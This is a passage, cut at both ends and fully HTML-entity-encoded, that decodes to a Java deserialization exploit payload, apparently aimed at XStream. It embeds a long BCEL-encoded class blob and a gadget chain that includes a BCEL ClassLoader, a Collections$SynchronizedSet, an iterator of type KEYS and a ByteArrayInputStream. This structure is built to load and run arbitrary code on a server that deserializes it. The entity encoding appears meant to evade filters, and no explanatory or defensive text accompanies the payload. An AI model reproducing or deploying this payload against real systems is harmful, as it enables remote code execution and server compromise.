#100;&#102;&#36;&#110;&#36;&#102;&#55;&#36;&#56;&#53;&#36;&#98;&#54;&#36;&#111;&#36;&#101;&#49;&#36;&#53;&#100;&#36;&#97;&#56;&#36;&#101;&#52;&#36;&#100;&#101;&#50;&#54;&#36;&#116;&#75;&#108;&#36;&#100;&#97;&#111;&#36;&#100;&#55;&#115;&#36;&#97;&#97;&#36;&#106;&#36;&#102;&#55;&#36;&#97;&#99;&#55;&#36;&#99;&#100;&#36;&#100;&#50;&#36;&#101;&#101;&#36;&#56;&#97;&#36;&#57;&#53;&#54;&#36;&#57;&#98;&#36;&#57;&#51;&#36;&#97;&#53;&#36;&#97;&#50;&#36;&#102;&#54;&#114;&#36;&#122;&#73;&#36;&#57;&#51;&#53;&#36;&#99;&#57;&#36;&#108;&#36;&#97;&#51;&#36;&#97;&#57;&#36;&#98;&#52;&#36;&#77;&#36;&#102;&#50;&#36;&#99;&#101;&#83;&#36;&#110;&#36;&#57;&#57;&#77;&#36;&#76;&#36;&#100;&#102;&#36;&#99;&#101;&#107;&#53;&#114;&#36;&#100;&#100;&#36;&#116;&#36;&#98;&#56;&#36;&#109;&#36;&#97;&#102;&#36;&#76;&#36;&#100;&#56;&#119;&#36;&#100;&#99;&#36;&#101;&#49;&#36;&#102;&#99;&#36;&#99;&#98;&#36;&#100;&#98;&#36;&#53;&#99;&#36;&#53;&#100;&#70;&#36;&#69;&#36;&#51;&#100;&#36;&#98;&#54;&#36;&#56;&#52;&#36;&#100;&#51;&#36;&#74;&#36;&#102;&#98;&#114;&#36;&#113;&#54;&#36;&#111;&#36;&#57;&#98;&#121;&#36;&#114;&#36;&#51;&#100;&#36;&#120;&#36;&#100;&#56;&#82;&#36;&#101;&#54;&#48;&#101;&#51;&#36;&#97;&#102;&#36;&#57;&#97;&#36;&#57;&#53;&#36;&#98;&#55;&#76;&#36;&#83;&#36;&#97;&#98;&#76;&#36;&#102;&#52;&#36;&#101;&#49;&#36;&#111;&#70;&#36;&#87;&#36;&#99;&#56;&#36;&#99;&#51;&#36;&#104;&#36;&#99;&#97;&#36;&#81;&#36;&#56;&#55;&#36;&#100;&#99;&#116;&#54;&#36;&#97;&#48;&#36;&#57;&#101;&#36;&#98;&#48;&#102;&#72;&#36;&#101;&#56;&#36;&#56;&#53;&#51;&#36;&#102;&#51;&#36;&#100;&#54;&#36;&#36;&#36;&#100;&#57;&#36;&#97;&#48;&#36;&#102;&#98;&#36;&#100;&#54;&#88;&#36;&#100;&#57;&#36;&#78;&#36;&#101;&#57;&#36;&#100;&#57;&#36;&#99;&#56;&#102;&#68;&#36;&#57;&#102;&#72;&#57;&#51;&#36;&#102;&#57;&#36;&#53;&#98;&#36;&#55;&#101;&#36;&#104;&#36;&#101;&#97;&#36;&#36;&#107;&#36;&#98;&#55;&#36;&#101;&#97;&#36;&#97;&#52;&#36;&#57;&#53;&#36;&#90;&#36;&#113;&#36;&#102;&#98;&#36;&#99;&#50;&#36;&#100;&#55;&#36;&#100;&#55;&#36;&#73;&#36;&#80;&#36;&#101;&#101;&#36;&#56;&#54;&#36;&#56;&#98;&#98;&#36;&#98;&#97;&#36;&#36;&#36;&#98;&#54;&#36;&#101;&#100;&#36;&#56;&#54;&#52;&#36;&#108;&#36;&#56;&#50;&#36;&#98;&#48;&#36;&#101;&#53;&#36;&#79;&#36;&#102;&#57;&#36;&#57;&#54;&#36;&#122;&#36;&#98;&#48;&#36;&#82;&#36;&#57;&#98;&#36;&#102;&#57;&#36;&#56;&#50;&#36;&#57;&#53;&#36;&#51;&#102;&#118;&#110;&#36;&#100;&#57;&#69;&#57;&#36;&#99;&#54;&#36;&#56;&#48;&#36;&#56;&#97;&#118;&#84;&#36;&#97;&#51;&#36;&#57;&#54;&#36;&#100;&#50;&#36;&#98;&#102;&#36;&#98;&#55;&#36;&#53;&#100;&#36;&#56;&#53;&#114;&#36;&#78;&#36;&#86;&#36;&#100;&#49;&#36;&#99;&#97;&#36;&#105;&#36;&#111;&#36;&#99;&#55;&#36;&#97;&#102;&#36;&#97;&#49;&#36;&#119;&#36;&#56;&#55;&#36;&#101;&#97;&#36;&#97;&#56;&#36;&#57;&#97;&#36;&#56;&#51;&#36;&#57;&#54;&#36;&#100;&#56;&#36;&#107;&#36;&#97;&#100;&#36;&#97;&#57;&#36;&#102;&#99;&#36;&#70;&#122;&#36;&#79;&#36;&#98;&#53;&#36;&#68;&#36;&#51;&#98;&#36;&#85;&#36;&#51;&#101;&#36;&#90;&#57;&#36;&#100;&#52;&#36;&#78;&#118;&#36;&#101;&#52;&#80;&#36;&#57;&#102;&#67;&#67;&#36;&#98;&#52;&#49;&#36;&#56;&#55;&#36;&#86;&#36;&#53;&#100;&#36;&#82;&#51;&#36;&#83;&#36;&#99;&#57;&#36;&#110;&#106;&#70;&#36;&#117;&#109;&#36;&#101;&#97;&#36;&#97;&#97;&#50;&#105;&#36;&#53;&#98;&#36;&#108;&#36;&#53;&#100;&#89;&#48;&#36;&#101;&#97;&#36;&#97;&#97;&#54;&#36;&#97;&#98;&#36;&#99;&#100;&#36;&#97;&#97;&#36;&#56;&#50;&#36;&#100;&#100;&#111;&#104;&#36;&#101;&#101;&#82;&#77;&#53;&#36;&#98;&#97;&#36;&#119;&#36;&#56;&#55;&#36;&#87;&#36;&#101;&#57;&#36;&#111;&#36;&#100;&#97;&#36;&#103;&#36;&#97;&#49;&#36;&#100;&#54;&#36;&#56;&#57;&#36;&#99;&#97;&#36;&#97;&#56;&#36;&#57;&#57;&#36;&#57;&#52;&#36;&#97;&#97;&#36;&#57;&#97;&#36;&#97;&#57;&#117;&#80;&#36;&#54;&#48;&#80;&#36;&#98;&#48;&#36;&#51;&#97;&#36;&#90;&#36;&#97;&#97;&#36;&#57;&#98;&#36;&#53;&#100;&#53;&#36;&#51;&#102;&#99;&#36;&#99;&#100;&#36;&#74;&#36;&#115;&#102;&#36;&#100;&#54;&#48;&#36;&#98;&#49;&#36;&#105;&#36;&#100;&#54;&#36;&#53;&#101;&#36;&#99;&#53;&#36;&#98;&#97;&#36;&#101;&#56;&#36;&#102;&#97;&#36;&#105;&#54;&#116;&#36;&#101;&#57;&#36;&#97;&#54;&#106;&#50;&#36;&#52;&#48;&#36;&#100;&#98;&#36;&#114;&#36;&#100;&#52;&#36;&#99;&#97;&#121;&#36;&#101;&#51;&#36;&#86;&#84;&#69;&#36;&#101;&#102;&#36;&#97;&#50;&#36;&#100;&#102;&#36;&#120;&#50;&#36;&#101;&#55;&#36;&#105;&#54;&#36;&#102;&#100;&#36;&#99;&#48;&#36;&#84;&#70;&#112;&#36;&#106;&#36;&#55;&#102;&#36;&#102;&#50;&#36;&#68;&#36;&#97;&#48;&#36;&#83;&#36;&#101;&#100;&#36;&#51;&#99;&#36;&#101;&#51;&#36;&#109;&#36;&#57;&#97;&#56;&#36;&#103;&#36;&#57;&#52;&#36;&#100;&#54;&#36;&#97;&#51;&#36;&#79;&#36;&#78;&#48;&#36;&#100;&#49;&#36;&#56;&#56;&#77;&#88;&#36;&#56;&#49;&#56;&#36;&#97;&#50;&#36;&#101;&#56;&#36;&#101;&#54;&#36;&#100;&#101;&#36;&#51;&#101;&#36;&#97;&#99;&#36;&#99;&#52;&#97;&#36;&#55;&#101;&#97;&#36;&#56;&#99;&#36;&#54;&#48;&#36;&#86;&#36;&#97;&#54;&#36;&#100;&#48;&#36;&#56;&#50;&#51;&#104;&#36;&#99;&#53;&#36;&#70;&#106;&#36;&#53;&#100;&#36;&#99;&#50;&#106;&#36;&#102;&#99;&#36;&#99;&#56;&#36;&#95;&#36;&#56;&#97;&#36;&#101;&#98;&#88;&#79;&#111;&#107;&#113;&#36;&#68;&#36;&#101;&#98;&#36;&#102;&#48;&#36;&#88;&#54;&#36;&#54;&#48;&#36;&#104;&#36;&#98;&#100;&#36;&#99;&#100;&#36;&#100;&#51;&#36;&#57;&#102;&#36;&#56;&#57;&#36;&#101;&#102;&#36;&#98;&#49;&#36;&#106;&#36;&#51;&#98;&#36;&#89;&#111;&#36;&#84;&#36;&#98;&#101;&#67;&#36;&#72;&#36;&#102;&#100;&#85;&#36;&#102;&#48;&#36;&#55;&#102;&#36;&#90;&#36;&#57;&#100;&#36;&#100;&#56;&#36;&#99;&#57;&#36;&#99;&#56;&#36;&#100;&#100;&#36;&#101;&#99;&#36;&#102;&#99;&#36;&#102;&#55;&#36;&#101;&#48;&#36;&#53;&#101;&#70;&#36;&#51;&#100;&#36;&#99;&#99;&#55;&#36;&#100;&#52;&#36;&#55;&#100;&#36;&#57;&#52;&#85;&#49;&#36;&#56;&#50;&#36;&#99;&#55;&#79;&#36;&#97;&#53;&#56;&#107;&#36;&#51;&#102;&#36;&#56;&#53;&#36;&#100;&#51;&#120;&#36;&#65;&#36;&#80;&#66;&#101;&#36;&#97;&#52;&#36;&#51;&#101;&#36;&#51;&#99;&#68;&#36;&#57;&#57;&#36;&#99;&#54;&#120;&#36;&#51;&#98;&#36;&#102;&#49;&#48;&#118;&#36;&#97;&#49;&#36;&#56;&#54;&#81;&#36;&#53;&#98;&#36;&#100;&#48;&#36;&#56;&#53;&#36;&#100;&#100;&#36;&#102;&#99;&#36;&#103;&#36;&#98;&#97;&#65;&#36;&#102;&#98;&#110;&#36;&#51;&#99;&#36;&#99;&#50;&#36;&#89;&#36;&#99;&#52;&#36;&#75;&#36;&#55;&#98;&#36;&#102;&#48;&#36;&#117;&#36;&#101;&#55;&#36;&#98;&#100;&#36;&#102;&#99;&#36;&#51;&#98;&#36;&#56;&#56;&#36;&#100;&#99;&#36;&#99;&#52;&#36;&#101;&#102;&#36;&#97;&#56;&#85;&#36;&#100;&#49;&#36;&#97;&#51;&#98;&#36;&#57;&#102;&#36;&#56;&#97;&#36;&#53;&#101;&#36;&#86;&#36;&#55;&#100;&#36;&#119;&#36;&#102;&#54;&#36;&#56;&#55;&#36;&#112;&#36;&#57;&#102;&#36;&#102;&#98;&#36;&#99;&#51;&#36;&#102;&#49;&#36;&#56;&#48;&#36;&#56;&#97;&#36;&#56;&#51;&#80;&#36;&#98;&#56;&#36;&#98;&#97;&#73;&#36;&#102;&#98;&#36;&#102;&#102;&#36;&#97;&#49;&#90;&#36;&#82;&#36;&#97;&#101;&#36;&#79;&#36;&#100;&#99;&#100;&#36;&#97;&#54;&#36;&#98;&#52;&#36;&#101;&#97;&#36;&#57;&#49;&#36;&#99;&#51;&#36;&#97;&#49;&#36;&#73;&#77;&#36;&#80;&#51;&#36;&#54;&#48;&#36;&#70;&#36;&#107;&#36;&#102;&#98;&#36;&#88;&#36;&#57;&#102;&#36;&#115;&#36;&#56;&#51;&#36;&#97;&#97;&#36;&#101;&#99;&#36;&#74;&#36;&#65;&#36;&#65;&#10;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#110;&#97;&#109;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#114;&#101;&#110;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#50;&#99;&#101;&#114;&#116;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#104;&#97;&#115;&#104;&#116;&#97;&#98;&#108;&#101;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#32;&#100;&#101;&#102;&#105;&#110;&#101;&#100;&#45;&#105;&#110;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#108;&#111;&#97;&#100;&#101;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#105;&#110;&#99;&#105;&#112;&#97;&#108;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#60;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#34;&#99;&#117;&#115;&#116;&#111;&#109;&#34;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#115;&#101;&#116;&#34;&#62;&#60;&#47;&#99;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#117;&#116;&#101;&#120;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#34;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#34;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#62;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#116;&#105;&#118;&#101;&#76;&#105;&#98;&#114;&#97;&#114;&#105;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#76;&#111;&#99;&#107;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#120;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#115;&#117;&#110;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#83;&#121;&#110;&#116;&#104;&#101;&#116;&#105;&#99;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#116;&#104;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#46;&#60;&#47;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#108;&#111;&#97;&#100;&#101;&#100;&#67;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#101;&#114;&#84;&#111;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#121;&#112;&#101;&#62;&#75;&#69;&#89;&#83;&#60;&#47;&#116;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#66;&#121;&#116;&#101;&#65;&#114;&#114;&#97;&#121;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#98;&#117;&#102;&#62;&#60;&#47;&#98;&#117;&#102;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#111;&#115;&#62;&#48;&#60;&#47;&#112;&#111;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#97;&#114;&#107;&#62;&#48;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#99;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#62;&#10;&#32;&